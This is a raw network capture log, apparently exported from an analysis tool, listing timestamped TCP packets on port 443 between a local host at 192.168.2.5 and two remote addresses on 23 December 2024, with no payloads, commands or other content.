                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.940932989 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.940953016 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.941421032 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.941435099 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.982692957 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:57.982880116 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.085463047 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.139121056 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.428698063 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.428715944 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.432451963 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.432495117 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.432563066 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.483294010 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.483356953 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.483413935 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.483428001 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.488565922 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.488626957 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.488643885 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.488827944 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.488903046 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.647032976 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.647227049 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.661358118 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.661385059 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.692130089 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.692143917 CET44349796142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.739087105 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.773459911 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.773816109 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.773955107 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.779628038 CET49792443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.779643059 CET44349792142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798758030 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798816919 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798850060 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798885107 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798902035 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798938036 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.798957109 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.847754002 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.847794056 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.847872019 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.847892046 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.848067045 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.857991934 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.862042904 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.863234997 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.863245964 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.906039000 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.919163942 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.960105896 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.960122108 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.989340067 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.989398003 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.989413023 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.000756979 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.001009941 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.001025915 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.010380983 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.010438919 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.010451078 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.023704052 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.023757935 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.023777008 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.037440062 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.037523031 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.037545919 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.050221920 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.050276041 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.050293922 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.063990116 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.064192057 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.064203024 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.077578068 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.077644110 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.077661037 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.088572025 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.088679075 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.088690996 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.101950884 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.103055000 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.103070974 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.115700960 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.115781069 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.115793943 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.129281044 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.129395008 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.129410982 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.170401096 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.181314945 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.183644056 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.183739901 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.183763981 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.193344116 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.193422079 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.193435907 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.206274986 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.206363916 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.206376076 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.217986107 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.218071938 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.218085051 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.229629993 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.229692936 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.229712009 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240535021 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240611076 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240614891 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240639925 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240684986 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.251276016 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.261457920 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.261519909 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.261528969 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271023989 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271145105 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271224022 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271234035 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271286011 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.280599117 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.290117979 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.290205002 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.290214062 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299099922 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299138069 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299258947 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299277067 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.302922964 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.307812929 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.316281080 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.316353083 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.316385984 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.324604988 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.324657917 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.324671984 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.332773924 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.332843065 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.332859993 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.340833902 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.340903044 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.340913057 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.349276066 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.349323988 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.349339008 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.356592894 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.356657028 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.356671095 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.364418030 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.364483118 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.364497900 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.372404099 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.372483969 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.372499943 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.380143881 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.380259991 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.382765055 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.382790089 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.382850885 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.385828018 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.391592026 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.391690969 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.391697884 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.391731024 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.391786098 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.397285938 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.402961969 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.403023958 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.403034925 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.409950018 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.410082102 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.410140991 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.410161018 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.410351038 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.414164066 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.415534019 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.415594101 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.415610075 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.421819925 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.421962976 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.421983004 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.425399065 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.425457954 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.425466061 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.425764084 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.425806999 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.425905943 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:01.296006918 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:01.296046972 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:01.296138048 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:01.296500921 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:01.296513081 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.407593966 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.407613993 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.407707930 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.407967091 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.407975912 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.456857920 CET49796443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.696250916 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.696302891 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.696950912 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.696964025 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.699954033 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.699959040 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.756759882 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.756835938 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.756853104 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.756907940 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.807215929 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.807356119 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.955555916 CET49816443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.955581903 CET4434981694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.958116055 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.958128929 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960369110 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960372925 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960422039 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960433006 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960491896 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960496902 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960565090 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960577011 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960621119 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960632086 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960700989 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960712910 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960750103 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960762024 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960804939 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960817099 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960864067 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960874081 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960922003 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960935116 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960973024 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.960984945 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961020947 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961033106 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961078882 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961091042 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961133003 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961143970 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961184025 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961194992 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961446047 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961451054 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.454839945 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.454881907 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.454961061 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.455276966 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.455287933 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933361053 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933475018 CET49820443192.168.2.594.130.188.57
